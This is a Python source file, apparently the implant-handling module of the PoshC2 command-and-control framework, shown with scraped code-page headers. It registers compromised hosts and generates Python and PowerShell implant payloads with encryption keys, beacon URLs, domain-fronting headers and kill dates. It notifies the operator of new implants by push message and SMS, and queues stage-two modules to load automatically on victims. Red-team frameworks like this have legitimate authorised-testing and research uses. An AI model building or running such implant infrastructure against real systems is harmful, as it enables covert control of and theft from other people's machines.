111 lines
4.6 KiB
Python
111 lines
4.6 KiB
Python
#!/usr/bin/env python
|
|
|
|
from Colours import Colours
|
|
from Utils import randomuri, gen_key
|
|
from Config import PayloadsDirectory, FilesDirectory
|
|
from DB import select_item, get_defaultbeacon, get_killdate, get_dfheader, get_otherbeaconurls, get_defaultuseragent, new_implant, new_task, update_mods, get_autoruns
|
|
from Core import get_images
|
|
|
|
import urllib2, base64, datetime
|
|
|
|
class Implant(object):
|
|
|
|
def __init__(self, ipaddress, pivot, domain, user, hostname, arch, pid, proxy):
|
|
self.RandomURI = randomuri()
|
|
self.Label = None
|
|
self.User = user
|
|
self.Hostname = hostname
|
|
self.IPAddress = ipaddress
|
|
self.Key = gen_key()
|
|
self.FirstSeen = (datetime.datetime.now()).strftime("%m/%d/%Y %H:%M:%S")
|
|
self.LastSeen = (datetime.datetime.now()).strftime("%m/%d/%Y %H:%M:%S")
|
|
self.PID = pid
|
|
self.Proxy = proxy
|
|
self.Arch = arch
|
|
self.Domain = domain
|
|
self.DomainFrontHeader = get_dfheader()
|
|
self.Alive = "Yes"
|
|
self.UserAgent = get_defaultuseragent()
|
|
self.Sleep = get_defaultbeacon()
|
|
self.ModsLoaded = ""
|
|
self.ImplantID = ""
|
|
self.Pivot = pivot
|
|
self.KillDate = get_killdate()
|
|
self.ServerURL = select_item("HostnameIP", "C2Server")
|
|
self.AllBeaconURLs = get_otherbeaconurls()
|
|
self.AllBeaconImages = get_images()
|
|
self.SharpCore = """
|
|
RANDOMURI19901%s10991IRUMODNAR
|
|
URLS10484390243%s34209348401SLRU
|
|
KILLDATE1665%s5661ETADLLIK
|
|
SLEEP98001%s10089PEELS
|
|
NEWKEY8839394%s4939388YEKWEN
|
|
IMGS19459394%s49395491SGMI""" % (self.RandomURI, self.AllBeaconURLs, self.KillDate, self.Sleep, self.Key, self.AllBeaconImages)
|
|
with open("%spy_dropper.sh" % (PayloadsDirectory), 'rb') as f:
|
|
self.PythonImplant = base64.b64encode(f.read())
|
|
py_implant_core = open("%s/Implant-Core.py" % FilesDirectory, 'r').read()
|
|
self.PythonCore = py_implant_core % (self.DomainFrontHeader,self.Sleep, self.AllBeaconImages, self.AllBeaconURLs, self.KillDate, self.PythonImplant, self.Key, self.RandomURI, self.UserAgent)
|
|
ps_implant_core = open("%s/Implant-Core.ps1" % FilesDirectory, 'r').read()
|
|
self.C2Core = ps_implant_core % (self.Key, self.Sleep, self.AllBeaconImages, self.RandomURI, self.RandomURI, self.KillDate, self.AllBeaconURLs)
|
|
#Add all db elements
|
|
|
|
def display(self):
|
|
print Colours.GREEN,""
|
|
it = self.Pivot
|
|
if (it == "OSX"):
|
|
it = "Python"
|
|
print "[%s] New %s implant connected: (uri=%s key=%s)" % (self.ImplantID, it, self.RandomURI, self.Key)
|
|
print "%s | Time:%s | PID:%s | Sleep:%s | %s (%s) | URL:%s" % (self.IPAddress, self.FirstSeen, self.PID, self.Sleep, (self.User+" @ "+self.Hostname), self.Arch, self.Proxy)
|
|
print "",Colours.END
|
|
|
|
try:
|
|
sound = select_item("Sounds","C2Server")
|
|
if sound == "Yes":
|
|
import pyttsx3
|
|
engine = pyttsx3.init()
|
|
rate = engine.getProperty('rate')
|
|
engine.setProperty('voice', "english-us")
|
|
engine.setProperty('rate', rate-30)
|
|
engine.say("Nice, we have an implant")
|
|
engine.runAndWait()
|
|
except Exception as e:
|
|
pass
|
|
|
|
try:
|
|
apikey = select_item("APIKEY","C2Server")
|
|
mobile = select_item("MobileNumber","C2Server")
|
|
enotifications = select_item("EnableNotifications","C2Server")
|
|
poapitoken = select_item("APIToken","C2Server")
|
|
poapiuser = select_item("APIUser","C2Server")
|
|
|
|
if enotifications == "Yes":
|
|
import httplib, urllib
|
|
conn = httplib.HTTPSConnection("api.pushover.net:443")
|
|
conn.request("POST", "/1/messages.json",
|
|
urllib.urlencode({
|
|
"token": poapitoken,
|
|
"user": poapiuser,
|
|
"message": "NewImplant: %s @ %s" % (self.User,self.Hostname),
|
|
}), { "Content-type": "application/x-www-form-urlencoded" })
|
|
conn.getresponse()
|
|
|
|
if enotifications == "Yes" and apikey and mobile:
|
|
for number in mobile.split(","):
|
|
number = number.replace('"','')
|
|
url = "https://api.clockworksms.com/http/send.aspx?key=%s&to=%s&from=PoshC2&content=NewImplant:%s\\%s @ %s" % (apikey, number, self.Domain,self.User,self.Hostname)
|
|
url = url.replace(" ","+")
|
|
urllib2.urlopen(url)
|
|
except Exception as e:
|
|
print "SMS send error: %s" % e
|
|
|
|
def save(self):
|
|
self.ImplantID = new_implant(self.RandomURI, self.User, self.Hostname, self.IPAddress, self.Key, self.FirstSeen, self.FirstSeen, self.PID, self.Proxy, self.Arch, self.Domain, self.Alive, self.Sleep, self.ModsLoaded, self.Pivot, self.Label)
|
|
|
|
def autoruns(self):
|
|
new_task("loadmodule Stage2-Core.ps1", "autoruns", self.RandomURI)
|
|
update_mods("Stage2-Core.ps1", self.RandomURI)
|
|
result = get_autoruns()
|
|
if result:
|
|
for autorun in result:
|
|
new_task(autorun[1], "autoruns", self.RandomURI)
|